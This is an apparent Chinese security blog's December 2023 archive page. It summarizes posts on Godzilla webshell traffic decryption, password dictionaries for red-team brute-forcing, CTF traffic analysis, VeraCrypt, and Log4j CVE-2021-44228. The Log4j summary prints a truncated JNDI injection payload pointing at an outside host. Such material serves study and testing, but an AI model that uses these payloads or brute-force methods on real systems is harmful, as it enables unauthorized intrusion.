websec80

  博客园  :: 首页  :: 新随笔  :: 联系 ::  :: 管理
  96 随笔 :: 50 文章 :: 3 评论 :: 13万 阅读

12 2023 档案

摘要:通过kali安装将 Kali Linux 源添加到 sources.list 文件: 打开 /etc/apt/sources.list 文件,然后将以下行添加到文件末尾: deb http://http.kali.org/kali kali-rolling main non-free contrib 阅读全文
posted @ 2023-12-28 19:14 websec80 阅读(103) 评论(0) 推荐(0) 编辑

摘要:哥斯拉是继菜刀、蚁剑、冰蝎之后的又一个webshell利器,这里就不过多介绍了。GitHub地址:https://github.com/BeichenDream/Godzilla很多一线师傅不太了解其中的加解密手法,无法进行解密,这篇文章介绍了解密的方式方法,主要补全了网上缺少的ASP流量分析、PH 阅读全文
posted @ 2023-12-24 12:56 websec80 阅读(450) 评论(0) 推荐(0) 编辑

摘要:Veracrypt怎么用 接下来,我们开始讲解Veracrypt的使用方法。 1、创建一个加密容器 1.1、下载Veracrypt软件,安装并打开。选择“创建加密文件容器”。 下载链接:https://www.veracrypt.fr/en/Downloads.html Copy 1.2、选择容器的 阅读全文
posted @ 2023-12-08 09:09 websec80 阅读(1056) 评论(0) 推荐(0) 编辑

摘要:说实话平时一般不会自己去生成字典,普通的字典包就够用了,前段时间打红队的时候遇到了一次内网中数据库密码为vule前缀的,但是内网中其他数据库密码还未知,于是就需要以vule前缀自己生成一下密码尝试爆破。就有了这篇文章分享。 wget https://sourceforge.net/projects/ 阅读全文
posted @ 2023-12-07 16:01 websec80 阅读(340) 评论(0) 推荐(0) 编辑

摘要:流量分析 流量分析是CTF里面的常见题目,通常会给我们一堆数据包,然后让我们用Wireshark分析流量包里面的内容排除无关信息然后获取隐藏的flag 链接:https://pan.baidu.com/s/1I-YQhV2VVGE1DZXb_WlnSA?pwd=c93i提取码:c93i 工具: ht 阅读全文
posted @ 2023-12-06 14:27 websec80 阅读(1443) 评论(0) 推荐(0) 编辑

摘要:0x00 前言 CVE-2021-44228 log4j:2.0 <= Apache log4j <= 2.14.1 patched of Java version:6u211+, 7u201+,8u191+, 11.0.1+ 基本Payload: ${jndi:ldap://dnslog.cn/a 阅读全文
posted @ 2023-12-05 10:33 websec80 阅读(684) 评论(0) 推荐(1) 编辑

点击右上角即可分享
微信分享提示